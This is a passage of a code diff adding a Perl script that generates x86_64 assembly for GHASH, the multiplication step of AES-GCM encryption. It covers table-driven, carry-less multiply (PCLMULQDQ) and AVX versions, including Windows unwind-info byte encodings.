+	mov	$Zhi,$tmp
+	shr	\$4,$Zhi
+	xor	8($Htbl,$nlo),$Zlo
+	shl	\$60,$tmp
+	xor	($Htbl,$nlo),$Zhi
+	and	\$0xf0,`&LB("$nhi")`
+	xor	($rem_4bit,$rem,8),$Zhi
+	mov	$Zlo,$rem
+	xor	$tmp,$Zlo
+
+	shr	\$4,$Zlo
+	and	\$0xf,$rem
+	mov	$Zhi,$tmp
+	shr	\$4,$Zhi
+	xor	8($Htbl,$nhi),$Zlo
+	shl	\$60,$tmp
+	xor	($Htbl,$nhi),$Zhi
+	xor	$tmp,$Zlo
+	xor	($rem_4bit,$rem,8),$Zhi
+
+	bswap	$Zlo
+	bswap	$Zhi
+___
+}}
+
+$code=<<___;
+.text
+.extern	OPENSSL_ia32cap_P
+
+.globl	gcm_gmult_4bit
+.type	gcm_gmult_4bit,\@function,2
+.align	16
+gcm_gmult_4bit:
+	push	%rbx
+	push	%rbp		# %rbp and %r12 are pushed exclusively in
+	push	%r12		# order to reuse Win64 exception handler...
+.Lgmult_prologue:
+
+	movzb	15($Xi),$Zlo
+	lea	.Lrem_4bit(%rip),$rem_4bit
+___
+	&loop	($Xi);
+$code.=<<___;
+	mov	$Zlo,8($Xi)
+	mov	$Zhi,($Xi)
+
+	mov	16(%rsp),%rbx
+	lea	24(%rsp),%rsp
+.Lgmult_epilogue:
+	ret
+.size	gcm_gmult_4bit,.-gcm_gmult_4bit
+___
+
+# per-function register layout
+$inp="%rdx";
+$len="%rcx";
+$rem_8bit=$rem_4bit;
+
+$code.=<<___;
+.globl	gcm_ghash_4bit
+.type	gcm_ghash_4bit,\@function,4
+.align	16
+gcm_ghash_4bit:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	sub	\$280,%rsp
+.Lghash_prologue:
+	mov	$inp,%r14		# reassign couple of args
+	mov	$len,%r15
+___
+{ my $inp="%r14";
+  my $dat="%edx";
+  my $len="%r15";
+  my @nhi=("%ebx","%ecx");
+  my @rem=("%r12","%r13");
+  my $Hshr4="%rbp";
+
+	&sub	($Htbl,-128);		# size optimization
+	&lea	($Hshr4,"16+128(%rsp)");
+	{ my @lo =($nlo,$nhi);
+          my @hi =($Zlo,$Zhi);
+
+	  &xor	($dat,$dat);
+	  for ($i=0,$j=-2;$i<18;$i++,$j++) {
+	    &mov	("$j(%rsp)",&LB($dat))		if ($i>1);
+	    &or		($lo[0],$tmp)			if ($i>1);
+	    &mov	(&LB($dat),&LB($lo[1]))		if ($i>0 && $i<17);
+	    &shr	($lo[1],4)			if ($i>0 && $i<17);
+	    &mov	($tmp,$hi[1])			if ($i>0 && $i<17);
+	    &shr	($hi[1],4)			if ($i>0 && $i<17);
+	    &mov	("8*$j($Hshr4)",$hi[0])		if ($i>1);
+	    &mov	($hi[0],"16*$i+0-128($Htbl)")	if ($i<16);
+	    &shl	(&LB($dat),4)			if ($i>0 && $i<17);
+	    &mov	("8*$j-128($Hshr4)",$lo[0])	if ($i>1);
+	    &mov	($lo[0],"16*$i+8-128($Htbl)")	if ($i<16);
+	    &shl	($tmp,60)			if ($i>0 && $i<17);
+
+	    push	(@lo,shift(@lo));
+	    push	(@hi,shift(@hi));
+	  }
+	}
+	&add	($Htbl,-128);
+	&mov	($Zlo,"8($Xi)");
+	&mov	($Zhi,"0($Xi)");
+	&add	($len,$inp);		# pointer to the end of data
+	&lea	($rem_8bit,".Lrem_8bit(%rip)");
+	&jmp	(".Louter_loop");
+
+$code.=".align	16\n.Louter_loop:\n";
+	&xor	($Zhi,"($inp)");
+	&mov	("%rdx","8($inp)");
+	&lea	($inp,"16($inp)");
+	&xor	("%rdx",$Zlo);
+	&mov	("($Xi)",$Zhi);
+	&mov	("8($Xi)","%rdx");
+	&shr	("%rdx",32);
+
+	&xor	($nlo,$nlo);
+	&rol	($dat,8);
+	&mov	(&LB($nlo),&LB($dat));
+	&movz	($nhi[0],&LB($dat));
+	&shl	(&LB($nlo),4);
+	&shr	($nhi[0],4);
+
+	for ($j=11,$i=0;$i<15;$i++) {
+	    &rol	($dat,8);
+	    &xor	($Zlo,"8($Htbl,$nlo)")			if ($i>0);
+	    &xor	($Zhi,"($Htbl,$nlo)")			if ($i>0);
+	    &mov	($Zlo,"8($Htbl,$nlo)")			if ($i==0);
+	    &mov	($Zhi,"($Htbl,$nlo)")			if ($i==0);
+
+	    &mov	(&LB($nlo),&LB($dat));
+	    &xor	($Zlo,$tmp)				if ($i>0);
+	    &movzw	($rem[1],"($rem_8bit,$rem[1],2)")	if ($i>0);
+
+	    &movz	($nhi[1],&LB($dat));
+	    &shl	(&LB($nlo),4);
+	    &movzb	($rem[0],"(%rsp,$nhi[0])");
+
+	    &shr	($nhi[1],4)				if ($i<14);
+	    &and	($nhi[1],0xf0)				if ($i==14);
+	    &shl	($rem[1],48)				if ($i>0);
+	    &xor	($rem[0],$Zlo);
+
+	    &mov	($tmp,$Zhi);
+	    &xor	($Zhi,$rem[1])				if ($i>0);
+	    &shr	($Zlo,8);
+
+	    &movz	($rem[0],&LB($rem[0]));
+	    &mov	($dat,"$j($Xi)")			if (--$j%4==0);
+	    &shr	($Zhi,8);
+
+	    &xor	($Zlo,"-128($Hshr4,$nhi[0],8)");
+	    &shl	($tmp,56);
+	    &xor	($Zhi,"($Hshr4,$nhi[0],8)");
+
+	    unshift	(@nhi,pop(@nhi));		# "rotate" registers
+	    unshift	(@rem,pop(@rem));
+	}
+	&movzw	($rem[1],"($rem_8bit,$rem[1],2)");
+	&xor	($Zlo,"8($Htbl,$nlo)");
+	&xor	($Zhi,"($Htbl,$nlo)");
+
+	&shl	($rem[1],48);
+	&xor	($Zlo,$tmp);
+
+	&xor	($Zhi,$rem[1]);
+	&movz	($rem[0],&LB($Zlo));
+	&shr	($Zlo,4);
+
+	&mov	($tmp,$Zhi);
+	&shl	(&LB($rem[0]),4);
+	&shr	($Zhi,4);
+
+	&xor	($Zlo,"8($Htbl,$nhi[0])");
+	&movzw	($rem[0],"($rem_8bit,$rem[0],2)");
+	&shl	($tmp,60);
+
+	&xor	($Zhi,"($Htbl,$nhi[0])");
+	&xor	($Zlo,$tmp);
+	&shl	($rem[0],48);
+
+	&bswap	($Zlo);
+	&xor	($Zhi,$rem[0]);
+
+	&bswap	($Zhi);
+	&cmp	($inp,$len);
+	&jb	(".Louter_loop");
+}
+$code.=<<___;
+	mov	$Zlo,8($Xi)
+	mov	$Zhi,($Xi)
+
+	lea	280(%rsp),%rsi
+	mov	0(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lghash_epilogue:
+	ret
+.size	gcm_ghash_4bit,.-gcm_ghash_4bit
+___
+
+######################################################################
+# PCLMULQDQ version.
+
+@_4args=$win64?	("%rcx","%rdx","%r8", "%r9") :	# Win64 order
+		("%rdi","%rsi","%rdx","%rcx");	# Unix order
+
+($Xi,$Xhi)=("%xmm0","%xmm1");	$Hkey="%xmm2";
+($T1,$T2,$T3)=("%xmm3","%xmm4","%xmm5");
+
+sub clmul64x64_T2 {	# minimal register pressure
+my ($Xhi,$Xi,$Hkey,$HK)=@_;
+
+if (!defined($HK)) {	$HK = $T2;
+$code.=<<___;
+	movdqa		$Xi,$Xhi		#
+	pshufd		\$0b01001110,$Xi,$T1
+	pshufd		\$0b01001110,$Hkey,$T2
+	pxor		$Xi,$T1			#
+	pxor		$Hkey,$T2
+___
+} else {
+$code.=<<___;
+	movdqa		$Xi,$Xhi		#
+	pshufd		\$0b01001110,$Xi,$T1
+	pxor		$Xi,$T1			#
+___
+}
+$code.=<<___;
+	pclmulqdq	\$0x00,$Hkey,$Xi	#######
+	pclmulqdq	\$0x11,$Hkey,$Xhi	#######
+	pclmulqdq	\$0x00,$HK,$T1		#######
+	pxor		$Xi,$T1			#
+	pxor		$Xhi,$T1		#
+
+	movdqa		$T1,$T2			#
+	psrldq		\$8,$T1
+	pslldq		\$8,$T2			#
+	pxor		$T1,$Xhi
+	pxor		$T2,$Xi			#
+___
+}
+
+sub reduction_alg9 {	# 17/11 times faster than Intel version
+my ($Xhi,$Xi) = @_;
+
+$code.=<<___;
+	# 1st phase
+	movdqa		$Xi,$T2			#
+	movdqa		$Xi,$T1
+	psllq		\$5,$Xi
+	pxor		$Xi,$T1			#
+	psllq		\$1,$Xi
+	pxor		$T1,$Xi			#
+	psllq		\$57,$Xi		#
+	movdqa		$Xi,$T1			#
+	pslldq		\$8,$Xi
+	psrldq		\$8,$T1			#	
+	pxor		$T2,$Xi
+	pxor		$T1,$Xhi		#
+
+	# 2nd phase
+	movdqa		$Xi,$T2
+	psrlq		\$1,$Xi
+	pxor		$T2,$Xhi		#
+	pxor		$Xi,$T2
+	psrlq		\$5,$Xi
+	pxor		$T2,$Xi			#
+	psrlq		\$1,$Xi			#
+	pxor		$Xhi,$Xi		#
+___
+}
+
+{ my ($Htbl,$Xip)=@_4args;
+  my $HK="%xmm6";
+
+$code.=<<___;
+.globl	gcm_init_clmul
+.type	gcm_init_clmul,\@abi-omnipotent
+.align	16
+gcm_init_clmul:
+.L_init_clmul:
+___
+$code.=<<___ if ($win64);
+.LSEH_begin_gcm_init_clmul:
+	# I can't trust assembler to use specific encoding:-(
+	.byte	0x48,0x83,0xec,0x18		#sub	$0x18,%rsp
+	.byte	0x0f,0x29,0x34,0x24		#movaps	%xmm6,(%rsp)
+___
+$code.=<<___;
+	movdqu		($Xip),$Hkey
+	pshufd		\$0b01001110,$Hkey,$Hkey	# dword swap
+
+	# <<1 twist
+	pshufd		\$0b11111111,$Hkey,$T2	# broadcast uppermost dword
+	movdqa		$Hkey,$T1
+	psllq		\$1,$Hkey
+	pxor		$T3,$T3			#
+	psrlq		\$63,$T1
+	pcmpgtd		$T2,$T3			# broadcast carry bit
+	pslldq		\$8,$T1
+	por		$T1,$Hkey		# H<<=1
+
+	# magic reduction
+	pand		.L0x1c2_polynomial(%rip),$T3
+	pxor		$T3,$Hkey		# if(carry) H^=0x1c2_polynomial
+
+	# calculate H^2
+	pshufd		\$0b01001110,$Hkey,$HK
+	movdqa		$Hkey,$Xi
+	pxor		$Hkey,$HK
+___
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey,$HK);
+	&reduction_alg9	($Xhi,$Xi);
+$code.=<<___;
+	pshufd		\$0b01001110,$Hkey,$T1
+	pshufd		\$0b01001110,$Xi,$T2
+	pxor		$Hkey,$T1		# Karatsuba pre-processing
+	movdqu		$Hkey,0x00($Htbl)	# save H
+	pxor		$Xi,$T2			# Karatsuba pre-processing
+	movdqu		$Xi,0x10($Htbl)		# save H^2
+	palignr		\$8,$T1,$T2		# low part is H.lo^H.hi...
+	movdqu		$T2,0x20($Htbl)		# save Karatsuba "salt"
+___
+if ($do4xaggr) {
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey,$HK);	# H^3
+	&reduction_alg9	($Xhi,$Xi);
+$code.=<<___;
+	movdqa		$Xi,$T3
+___
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey,$HK);	# H^4
+	&reduction_alg9	($Xhi,$Xi);
+$code.=<<___;
+	pshufd		\$0b01001110,$T3,$T1
+	pshufd		\$0b01001110,$Xi,$T2
+	pxor		$T3,$T1			# Karatsuba pre-processing
+	movdqu		$T3,0x30($Htbl)		# save H^3
+	pxor		$Xi,$T2			# Karatsuba pre-processing
+	movdqu		$Xi,0x40($Htbl)		# save H^4
+	palignr		\$8,$T1,$T2		# low part is H^3.lo^H^3.hi...
+	movdqu		$T2,0x50($Htbl)		# save Karatsuba "salt"
+___
+}
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	lea	0x18(%rsp),%rsp
+.LSEH_end_gcm_init_clmul:
+___
+$code.=<<___;
+	ret
+.size	gcm_init_clmul,.-gcm_init_clmul
+___
+}
+
+{ my ($Xip,$Htbl)=@_4args;
+
+$code.=<<___;
+.globl	gcm_gmult_clmul
+.type	gcm_gmult_clmul,\@abi-omnipotent
+.align	16
+gcm_gmult_clmul:
+.L_gmult_clmul:
+	movdqu		($Xip),$Xi
+	movdqa		.Lbswap_mask(%rip),$T3
+	movdqu		($Htbl),$Hkey
+	movdqu		0x20($Htbl),$T2
+	pshufb		$T3,$Xi
+___
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey,$T2);
+$code.=<<___ if (0 || (&reduction_alg9($Xhi,$Xi)&&0));
+	# experimental alternative. special thing about is that there
+	# no dependency between the two multiplications... 
+	mov		\$`0xE1<<1`,%eax
+	mov		\$0xA040608020C0E000,%r10	# ((7..0)·0xE0)&0xff
+	mov		\$0x07,%r11d
+	movq		%rax,$T1
+	movq		%r10,$T2
+	movq		%r11,$T3		# borrow $T3
+	pand		$Xi,$T3
+	pshufb		$T3,$T2			# ($Xi&7)·0xE0
+	movq		%rax,$T3
+	pclmulqdq	\$0x00,$Xi,$T1		# ·(0xE1<<1)
+	pxor		$Xi,$T2
+	pslldq		\$15,$T2
+	paddd		$T2,$T2			# <<(64+56+1)
+	pxor		$T2,$Xi
+	pclmulqdq	\$0x01,$T3,$Xi
+	movdqa		.Lbswap_mask(%rip),$T3	# reload $T3
+	psrldq		\$1,$T1
+	pxor		$T1,$Xhi
+	pslldq		\$7,$Xi
+	pxor		$Xhi,$Xi
+___
+$code.=<<___;
+	pshufb		$T3,$Xi
+	movdqu		$Xi,($Xip)
+	ret
+.size	gcm_gmult_clmul,.-gcm_gmult_clmul
+___
+}
+
+{ my ($Xip,$Htbl,$inp,$len)=@_4args;
+  my ($Xln,$Xmn,$Xhn,$Hkey2,$HK) = map("%xmm$_",(3..7));
+  my ($T1,$T2,$T3)=map("%xmm$_",(8..10));
+
+$code.=<<___;
+.globl	gcm_ghash_clmul
+.type	gcm_ghash_clmul,\@abi-omnipotent
+.align	32
+gcm_ghash_clmul:
+.L_ghash_clmul:
+___
+$code.=<<___ if ($win64);
+	lea	-0x88(%rsp),%rax
+.LSEH_begin_gcm_ghash_clmul:
+	# I can't trust assembler to use specific encoding:-(
+	.byte	0x48,0x8d,0x60,0xe0		#lea	-0x20(%rax),%rsp
+	.byte	0x0f,0x29,0x70,0xe0		#movaps	%xmm6,-0x20(%rax)
+	.byte	0x0f,0x29,0x78,0xf0		#movaps	%xmm7,-0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x00		#movaps	%xmm8,0(%rax)
+	.byte	0x44,0x0f,0x29,0x48,0x10	#movaps	%xmm9,0x10(%rax)
+	.byte	0x44,0x0f,0x29,0x50,0x20	#movaps	%xmm10,0x20(%rax)
+	.byte	0x44,0x0f,0x29,0x58,0x30	#movaps	%xmm11,0x30(%rax)
+	.byte	0x44,0x0f,0x29,0x60,0x40	#movaps	%xmm12,0x40(%rax)
+	.byte	0x44,0x0f,0x29,0x68,0x50	#movaps	%xmm13,0x50(%rax)
+	.byte	0x44,0x0f,0x29,0x70,0x60	#movaps	%xmm14,0x60(%rax)
+	.byte	0x44,0x0f,0x29,0x78,0x70	#movaps	%xmm15,0x70(%rax)
+___
+$code.=<<___;
+	movdqa		.Lbswap_mask(%rip),$T3
+
+	movdqu		($Xip),$Xi
+	movdqu		($Htbl),$Hkey
+	movdqu		0x20($Htbl),$HK
+	pshufb		$T3,$Xi
+
+	sub		\$0x10,$len
+	jz		.Lodd_tail
+
+	movdqu		0x10($Htbl),$Hkey2
+___
+if ($do4xaggr) {
+my ($Xl,$Xm,$Xh,$Hkey3,$Hkey4)=map("%xmm$_",(11..15));
+
+$code.=<<___;
+	mov		OPENSSL_ia32cap_P+4(%rip),%eax
+	cmp		\$0x30,$len
+	jb		.Lskip4x
+
+	and		\$`1<<26|1<<22`,%eax	# isolate MOVBE+XSAVE
+	cmp		\$`1<<22`,%eax		# check for MOVBE without XSAVE
+	je		.Lskip4x
+
+	sub		\$0x30,$len
+	mov		\$0xA040608020C0E000,%rax	# ((7..0)·0xE0)&0xff
+	movdqu		0x30($Htbl),$Hkey3
+	movdqu		0x40($Htbl),$Hkey4
+
+	#######
+	# Xi+4 =[(H*Ii+3) + (H^2*Ii+2) + (H^3*Ii+1) + H^4*(Ii+Xi)] mod P
+	#
+	movdqu		0x30($inp),$Xln
+	 movdqu		0x20($inp),$Xl
+	pshufb		$T3,$Xln
+	 pshufb		$T3,$Xl
+	movdqa		$Xln,$Xhn
+	pshufd		\$0b01001110,$Xln,$Xmn
+	pxor		$Xln,$Xmn
+	pclmulqdq	\$0x00,$Hkey,$Xln
+	pclmulqdq	\$0x11,$Hkey,$Xhn
+	pclmulqdq	\$0x00,$HK,$Xmn
+
+	movdqa		$Xl,$Xh
+	pshufd		\$0b01001110,$Xl,$Xm
+	pxor		$Xl,$Xm
+	pclmulqdq	\$0x00,$Hkey2,$Xl
+	pclmulqdq	\$0x11,$Hkey2,$Xh
+	pclmulqdq	\$0x10,$HK,$Xm
+	xorps		$Xl,$Xln
+	xorps		$Xh,$Xhn
+	movups		0x50($Htbl),$HK
+	xorps		$Xm,$Xmn
+
+	movdqu		0x10($inp),$Xl
+	 movdqu		0($inp),$T1
+	pshufb		$T3,$Xl
+	 pshufb		$T3,$T1
+	movdqa		$Xl,$Xh
+	pshufd		\$0b01001110,$Xl,$Xm
+	 pxor		$T1,$Xi
+	pxor		$Xl,$Xm
+	pclmulqdq	\$0x00,$Hkey3,$Xl
+	 movdqa		$Xi,$Xhi
+	 pshufd		\$0b01001110,$Xi,$T1
+	 pxor		$Xi,$T1
+	pclmulqdq	\$0x11,$Hkey3,$Xh
+	pclmulqdq	\$0x00,$HK,$Xm
+	xorps		$Xl,$Xln
+	xorps		$Xh,$Xhn
+
+	lea	0x40($inp),$inp
+	sub	\$0x40,$len
+	jc	.Ltail4x
+
+	jmp	.Lmod4_loop
+.align	32
+.Lmod4_loop:
+	pclmulqdq	\$0x00,$Hkey4,$Xi
+	xorps		$Xm,$Xmn
+	 movdqu		0x30($inp),$Xl
+	 pshufb		$T3,$Xl
+	pclmulqdq	\$0x11,$Hkey4,$Xhi
+	xorps		$Xln,$Xi
+	 movdqu		0x20($inp),$Xln
+	 movdqa		$Xl,$Xh
+	pclmulqdq	\$0x10,$HK,$T1
+	 pshufd		\$0b01001110,$Xl,$Xm
+	xorps		$Xhn,$Xhi
+	 pxor		$Xl,$Xm
+	 pshufb		$T3,$Xln
+	movups		0x20($Htbl),$HK
+	xorps		$Xmn,$T1
+	 pclmulqdq	\$0x00,$Hkey,$Xl
+	 pshufd		\$0b01001110,$Xln,$Xmn
+
+	pxor		$Xi,$T1			# aggregated Karatsuba post-processing
+	 movdqa		$Xln,$Xhn
+	pxor		$Xhi,$T1		#
+	 pxor		$Xln,$Xmn
+	movdqa		$T1,$T2			#
+	 pclmulqdq	\$0x11,$Hkey,$Xh
+	pslldq		\$8,$T1
+	psrldq		\$8,$T2			#
+	pxor		$T1,$Xi
+	movdqa		.L7_mask(%rip),$T1
+	pxor		$T2,$Xhi		#
+	movq		%rax,$T2
+
+	pand		$Xi,$T1			# 1st phase
+	pshufb		$T1,$T2			#
+	pxor		$Xi,$T2			#
+	 pclmulqdq	\$0x00,$HK,$Xm
+	psllq		\$57,$T2		#
+	movdqa		$T2,$T1			#
+	pslldq		\$8,$T2
+	 pclmulqdq	\$0x00,$Hkey2,$Xln
+	psrldq		\$8,$T1			#	
+	pxor		$T2,$Xi
+	pxor		$T1,$Xhi		#
+	movdqu		0($inp),$T1
+
+	movdqa		$Xi,$T2			# 2nd phase
+	psrlq		\$1,$Xi
+	 pclmulqdq	\$0x11,$Hkey2,$Xhn
+	 xorps		$Xl,$Xln
+	 movdqu		0x10($inp),$Xl
+	 pshufb		$T3,$Xl
+	 pclmulqdq	\$0x10,$HK,$Xmn
+	 xorps		$Xh,$Xhn
+	 movups		0x50($Htbl),$HK
+	pshufb		$T3,$T1
+	pxor		$T2,$Xhi		#
+	pxor		$Xi,$T2
+	psrlq		\$5,$Xi
+
+	 movdqa		$Xl,$Xh
+	 pxor		$Xm,$Xmn
+	 pshufd		\$0b01001110,$Xl,$Xm
+	pxor		$T2,$Xi			#
+	pxor		$T1,$Xhi
+	 pxor		$Xl,$Xm
+	 pclmulqdq	\$0x00,$Hkey3,$Xl
+	psrlq		\$1,$Xi			#
+	pxor		$Xhi,$Xi		#
+	movdqa		$Xi,$Xhi
+	 pclmulqdq	\$0x11,$Hkey3,$Xh
+	 xorps		$Xl,$Xln
+	pshufd		\$0b01001110,$Xi,$T1
+	pxor		$Xi,$T1
+
+	 pclmulqdq	\$0x00,$HK,$Xm
+	 xorps		$Xh,$Xhn
+
+	lea	0x40($inp),$inp
+	sub	\$0x40,$len
+	jnc	.Lmod4_loop
+
+.Ltail4x:
+	pclmulqdq	\$0x00,$Hkey4,$Xi
+	pclmulqdq	\$0x11,$Hkey4,$Xhi
+	pclmulqdq	\$0x10,$HK,$T1
+	xorps		$Xm,$Xmn
+	xorps		$Xln,$Xi
+	xorps		$Xhn,$Xhi
+	pxor		$Xi,$Xhi		# aggregated Karatsuba post-processing
+	pxor		$Xmn,$T1
+
+	pxor		$Xhi,$T1		#
+	pxor		$Xi,$Xhi
+
+	movdqa		$T1,$T2			#
+	psrldq		\$8,$T1
+	pslldq		\$8,$T2			#
+	pxor		$T1,$Xhi
+	pxor		$T2,$Xi			#
+___
+	&reduction_alg9($Xhi,$Xi);
+$code.=<<___;
+	add	\$0x40,$len
+	jz	.Ldone
+	movdqu	0x20($Htbl),$HK
+	sub	\$0x10,$len
+	jz	.Lodd_tail
+.Lskip4x:
+___
+}
+$code.=<<___;
+	#######
+	# Xi+2 =[H*(Ii+1 + Xi+1)] mod P =
+	#	[(H*Ii+1) + (H*Xi+1)] mod P =
+	#	[(H*Ii+1) + H^2*(Ii+Xi)] mod P
+	#
+	movdqu		($inp),$T1		# Ii
+	movdqu		16($inp),$Xln		# Ii+1
+	pshufb		$T3,$T1
+	pshufb		$T3,$Xln
+	pxor		$T1,$Xi			# Ii+Xi
+
+	movdqa		$Xln,$Xhn
+	pshufd		\$0b01001110,$Xln,$Xmn
+	pxor		$Xln,$Xmn
+	pclmulqdq	\$0x00,$Hkey,$Xln
+	pclmulqdq	\$0x11,$Hkey,$Xhn
+	pclmulqdq	\$0x00,$HK,$Xmn
+
+	lea		32($inp),$inp		# i+=2
+	nop
+	sub		\$0x20,$len
+	jbe		.Leven_tail
+	nop
+	jmp		.Lmod_loop
+
+.align	32
+.Lmod_loop:
+	movdqa		$Xi,$Xhi
+	movdqa		$Xmn,$T1
+	pshufd		\$0b01001110,$Xi,$Xmn	#
+	pxor		$Xi,$Xmn		#
+
+	pclmulqdq	\$0x00,$Hkey2,$Xi
+	pclmulqdq	\$0x11,$Hkey2,$Xhi
+	pclmulqdq	\$0x10,$HK,$Xmn
+
+	pxor		$Xln,$Xi		# (H*Ii+1) + H^2*(Ii+Xi)
+	pxor		$Xhn,$Xhi
+	  movdqu	($inp),$T2		# Ii
+	pxor		$Xi,$T1			# aggregated Karatsuba post-processing
+	  pshufb	$T3,$T2
+	  movdqu	16($inp),$Xln		# Ii+1
+
+	pxor		$Xhi,$T1
+	  pxor		$T2,$Xhi		# "Ii+Xi", consume early
+	pxor		$T1,$Xmn
+	 pshufb		$T3,$Xln
+	movdqa		$Xmn,$T1		#
+	psrldq		\$8,$T1
+	pslldq		\$8,$Xmn		#
+	pxor		$T1,$Xhi
+	pxor		$Xmn,$Xi		#
+
+	movdqa		$Xln,$Xhn		#
+
+	  movdqa	$Xi,$T2			# 1st phase
+	  movdqa	$Xi,$T1
+	  psllq		\$5,$Xi
+	  pxor		$Xi,$T1			#
+	pclmulqdq	\$0x00,$Hkey,$Xln	#######
+	  psllq		\$1,$Xi
+	  pxor		$T1,$Xi			#
+	  psllq		\$57,$Xi		#
+	  movdqa	$Xi,$T1			#
+	  pslldq	\$8,$Xi
+	  psrldq	\$8,$T1			#	
+	  pxor		$T2,$Xi
+	pshufd		\$0b01001110,$Xhn,$Xmn
+	  pxor		$T1,$Xhi		#
+	pxor		$Xhn,$Xmn		#
+
+	  movdqa	$Xi,$T2			# 2nd phase
+	  psrlq		\$1,$Xi
+	pclmulqdq	\$0x11,$Hkey,$Xhn	#######
+	  pxor		$T2,$Xhi		#
+	  pxor		$Xi,$T2
+	  psrlq		\$5,$Xi
+	  pxor		$T2,$Xi			#
+	lea		32($inp),$inp
+	  psrlq		\$1,$Xi			#
+	pclmulqdq	\$0x00,$HK,$Xmn		#######
+	  pxor		$Xhi,$Xi		#
+
+	sub		\$0x20,$len
+	ja		.Lmod_loop
+
+.Leven_tail:
+	 movdqa		$Xi,$Xhi
+	 movdqa		$Xmn,$T1
+	 pshufd		\$0b01001110,$Xi,$Xmn	#
+	 pxor		$Xi,$Xmn		#
+
+	pclmulqdq	\$0x00,$Hkey2,$Xi
+	pclmulqdq	\$0x11,$Hkey2,$Xhi
+	pclmulqdq	\$0x10,$HK,$Xmn
+
+	pxor		$Xln,$Xi		# (H*Ii+1) + H^2*(Ii+Xi)
+	pxor		$Xhn,$Xhi
+	pxor		$Xi,$T1
+	pxor		$Xhi,$T1
+	pxor		$T1,$Xmn
+	movdqa		$Xmn,$T1		#
+	psrldq		\$8,$T1
+	pslldq		\$8,$Xmn		#
+	pxor		$T1,$Xhi
+	pxor		$Xmn,$Xi		#
+___
+	&reduction_alg9	($Xhi,$Xi);
+$code.=<<___;
+	test		$len,$len
+	jnz		.Ldone
+
+.Lodd_tail:
+	movdqu		($inp),$T1		# Ii
+	pshufb		$T3,$T1
+	pxor		$T1,$Xi			# Ii+Xi
+___
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey,$HK);	# H*(Ii+Xi)
+	&reduction_alg9	($Xhi,$Xi);
+$code.=<<___;
+.Ldone:
+	pshufb		$T3,$Xi
+	movdqu		$Xi,($Xip)
+___
+$code.=<<___ if ($win64);
+	movaps	(%rsp),%xmm6
+	movaps	0x10(%rsp),%xmm7
+	movaps	0x20(%rsp),%xmm8
+	movaps	0x30(%rsp),%xmm9
+	movaps	0x40(%rsp),%xmm10
+	movaps	0x50(%rsp),%xmm11
+	movaps	0x60(%rsp),%xmm12
+	movaps	0x70(%rsp),%xmm13
+	movaps	0x80(%rsp),%xmm14
+	movaps	0x90(%rsp),%xmm15
+	lea	0xa8(%rsp),%rsp
+.LSEH_end_gcm_ghash_clmul:
+___
+$code.=<<___;
+	ret
+.size	gcm_ghash_clmul,.-gcm_ghash_clmul
+___
+}
+
+$code.=<<___;
+.globl	gcm_init_avx
+.type	gcm_init_avx,\@abi-omnipotent
+.align	32
+gcm_init_avx:
+___
+if ($avx) {
+my ($Htbl,$Xip)=@_4args;
+my $HK="%xmm6";
+
+$code.=<<___ if ($win64);
+.LSEH_begin_gcm_init_avx:
+	# I can't trust assembler to use specific encoding:-(
+	.byte	0x48,0x83,0xec,0x18		#sub	$0x18,%rsp
+	.byte	0x0f,0x29,0x34,0x24		#movaps	%xmm6,(%rsp)
+___
+$code.=<<___;
+	vzeroupper
+
+	vmovdqu		($Xip),$Hkey
+	vpshufd		\$0b01001110,$Hkey,$Hkey	# dword swap
+
+	# <<1 twist
+	vpshufd		\$0b11111111,$Hkey,$T2	# broadcast uppermost dword
+	vpsrlq		\$63,$Hkey,$T1
+	vpsllq		\$1,$Hkey,$Hkey
+	vpxor		$T3,$T3,$T3		#
+	vpcmpgtd	$T2,$T3,$T3		# broadcast carry bit
+	vpslldq		\$8,$T1,$T1
+	vpor		$T1,$Hkey,$Hkey		# H<<=1
+
+	# magic reduction
+	vpand		.L0x1c2_polynomial(%rip),$T3,$T3
+	vpxor		$T3,$Hkey,$Hkey		# if(carry) H^=0x1c2_polynomial
+
+	vpunpckhqdq	$Hkey,$Hkey,$HK
+	vmovdqa		$Hkey,$Xi
+	vpxor		$Hkey,$HK,$HK
+	mov		\$4,%r10		# up to H^8
+	jmp		.Linit_start_avx
+___
+
+sub clmul64x64_avx {
+my ($Xhi,$Xi,$Hkey,$HK)=@_;
+
+if (!defined($HK)) {	$HK = $T2;
+$code.=<<___;
+	vpunpckhqdq	$Xi,$Xi,$T1
+	vpunpckhqdq	$Hkey,$Hkey,$T2
+	vpxor		$Xi,$T1,$T1		#
+	vpxor		$Hkey,$T2,$T2
+___
+} else {
+$code.=<<___;
+	vpunpckhqdq	$Xi,$Xi,$T1
+	vpxor		$Xi,$T1,$T1		#
+___
+}
+$code.=<<___;
+	vpclmulqdq	\$0x11,$Hkey,$Xi,$Xhi	#######
+	vpclmulqdq	\$0x00,$Hkey,$Xi,$Xi	#######
+	vpclmulqdq	\$0x00,$HK,$T1,$T1	#######
+	vpxor		$Xi,$Xhi,$T2		#
+	vpxor		$T2,$T1,$T1		#
+
+	vpslldq		\$8,$T1,$T2		#
+	vpsrldq		\$8,$T1,$T1
+	vpxor		$T2,$Xi,$Xi		#
+	vpxor		$T1,$Xhi,$Xhi
+___
+}
+
+sub reduction_avx {
+my ($Xhi,$Xi) = @_;
+
+$code.=<<___;
+	vpsllq		\$57,$Xi,$T1		# 1st phase
+	vpsllq		\$62,$Xi,$T2
+	vpxor		$T1,$T2,$T2		#
+	vpsllq		\$63,$Xi,$T1
+	vpxor		$T1,$T2,$T2		#
+	vpslldq		\$8,$T2,$T1		#
+	vpsrldq		\$8,$T2,$T2
+	vpxor		$T1,$Xi,$Xi		#
+	vpxor		$T2,$Xhi,$Xhi
+
+	vpsrlq		\$1,$Xi,$T2		# 2nd phase
+	vpxor		$Xi,$Xhi,$Xhi
+	vpxor		$T2,$Xi,$Xi		#
+	vpsrlq		\$5,$T2,$T2
+	vpxor		$T2,$Xi,$Xi		#
+	vpsrlq		\$1,$Xi,$Xi		#
